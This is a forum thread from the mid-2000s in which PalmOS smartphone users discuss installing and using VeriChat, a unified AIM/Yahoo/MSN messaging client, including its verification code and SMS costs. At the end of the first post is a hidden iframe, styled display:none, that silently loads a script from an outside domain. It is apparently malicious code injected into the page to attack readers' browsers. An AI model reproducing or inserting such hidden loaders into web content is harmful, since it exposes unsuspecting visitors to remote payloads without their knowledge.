+ Reply to Thread

Spotted over at PIC: Unified IM for PalmOS Smartphones

PDAapps Releases Unified IM Client

Just thought you all would like to know. Sounds like a great app (Trillian for the 7135?), but it might need a 1xRTT or GPRS connection.

Anyone with a 7135 care to try it out and comment?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

7135 use

But to use it on the 7135 wouldnt you have to be connected at all times?
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Re: Spotted over at PIC: Unified IM for PalmOS Smartphones

Downloaded and installed.

Requires you entering your phones e-mail address? and the '5 digit code that came with your phone' for verification.

WTF is that?

I gave up, but the program does look interesting.

Originally posted by Token User
    PDAapps Releases Unified IM Client

Just thought you all would like to know. Sounds like a great app (Trillian for the 7135?), but it might need a 1xRTT or GPRS connection.

Anyone with a 7135 care to try it out and comment?
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

phone email address

Your phone email address is:
    ##########@message.alltel.com for alltel
    GREG HARKINS
    www.bringingfuntoyou.com

For VZN it is ##########@vtext.com here in CT

Re: phone email address

ok, and what about that 5 digit code they want?

Originally posted by GREGHARKINS
    Your phone email address is:
    ##########@message.alltel.com for alltel
    Jeff
    Tampa FL

Re: 7135 use

But to use it on the 7135 wouldnt you have to be connected at all times?
    Hence the need for a 1xRTT connection (Express Network). I don't think that Mobile Web will cut it unless it is a proxy based service around SMS, and THEN you would get hit with the text message at $0.02 incoming / $0.10 outgoing charges. Ouch.

I just spotted it. You guys can sort out the details before I buy my 7135

just got it working

In the setup, you enter you phones e-mail address as stated above.

THEN (as the program logged you on to 1x or qnc upon launching it) THE PROGRAM sends you an e-mail with a 5 digit code. Once you enter that, they have verification for the 15 day trial.

Program works pretty well. I like that it integrates AIM, Yahoo and MSN.

Don't know how much it is as you cannot purchase it at this time.

There ya go...hit me up if you get hooked on. Not tonight though...I am out.

Jeff
    Jeff
    Tampa FL

Unified IMing Client

Saw this over on Palm Infocenter - thought it might be of intrest here Haven't seen it posted, but if it was, I appologize in advance:

http://www.pdaapps.com/verichat/

(Quote from site):

VeriChat™ - VeriChat™ is an Unified Instant Messaging (IM) application for SmartPhones. VeriChat™ works with your persistent (GPRS/CDMA 1xRTT) or CSD wireless data connection to give you an always-on presence on the Yahoo!, MSN & AOL chat networks. You don't have to be in the VeriChat™ application for you to chat with your buddies. They always see you as online and can send you messages, and you can receive and reply to them. You can be logged onto Yahoo, Microsoft Messenger and AOL IM at the same time and can be talking to your buddies on either of these networks simultaneously.

Sounds good to me... alas I still have a 6035 so I can't test it out... although I'd surely like to use it when a 7135 on Sprint becomes available. :o Ah well.

Moved to proper forum

I've been beta testing this on the Treo 300 for a few weeks now. You can logged on even with the phone on standby. And the final release will work on the 7135

verichat

This looks like a great program, but its for phone users more or less that have always on service correct?

I dont see any advantage except being able to get all chat sessions at once for dail up users?

Correct me if im wrong, but its pretty kewl.
    GREG HARKINS
    www.bringingfuntoyou.com

Re: verichat

This looks like a great program, but its for phone users more or less that have always on service correct?

I dont see any advantage except being able to get all chat sessions at once for dail up users?

Correct me if im wrong, but its pretty kewl.
    Looking at the description, it appears to provide a graphical interface to the SMS interfaces to yahoo, AIM, and MSN. This is cool because you don't need to be logged onto the data network all of the time.

BUT be careful, these can get expensive to use really fast. (without a mobile messanger plan, and on Verizon, it is .10 for every outgoing message, .02 for every received message, plus .12 for every log on, log off, change in state -1 outgoing message, one incoming response for EACH service you are logging into.)

Even with a 600 message plan, if you use IM as much as I do on my computer (we use it at work), you will use up all of your messages in just a couple of days.

Alan

Administrator
    yeah it will eat up some alerts if your not careful. but if i get a message, i will tap the icon (already online with vision anyway) and go to the "session" and chat away. its a very good app. it crashed the i330 upon install but they sent me another file that works wonders. i highly recommend it!

Originally posted by marctronixx
    yeah it will eat up some alerts if your not careful. but if i get a message, i will tap the icon (already online with vision anyway) and go to the "session" and chat away. its a very good app. it crashed the i330 upon install but they sent me another file that works wonders. i highly recommend it!
    So you are saying that it uses SMS just for the initial alert, then establishes a "live" session? That is cool, and much nicer on the SMS budget. I may need to try this out. I don't use MSN or yahoo, but I use AIM a lot, and it would be nice to be logged on while I am out of the office.

Alan

Administrator
    well sicne the vision service is always on, all i have to do is trap the icon and go into chating, but it DOES use up alerts. so if i get an alert form someone, i will keep the program running and that way i dont waste used alerts...

A new version of Verichat was released today. It's up to version 1.75 now.

http://www.palmgear.com/software/sho...m?prodID=47394

Byrd Dog
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

I am trying to figure out how set verichat up so that it will use SMS rather than having to stay connected and use up minutes. I am able to open verichat, it connects, then I am able to chat with people. I have read from this forum that verichat has an SMS mode? how do i set this up? In verichat or MSN webpage?

Am I missing something?

How does the SMS thing work?

I tried disconnecting from QNC using the "red button" on the phone part, but the 7135 always requires has a soft reset sometime within the next 5 minutes.

did anyone figure out how to get verichat to work with sms?

David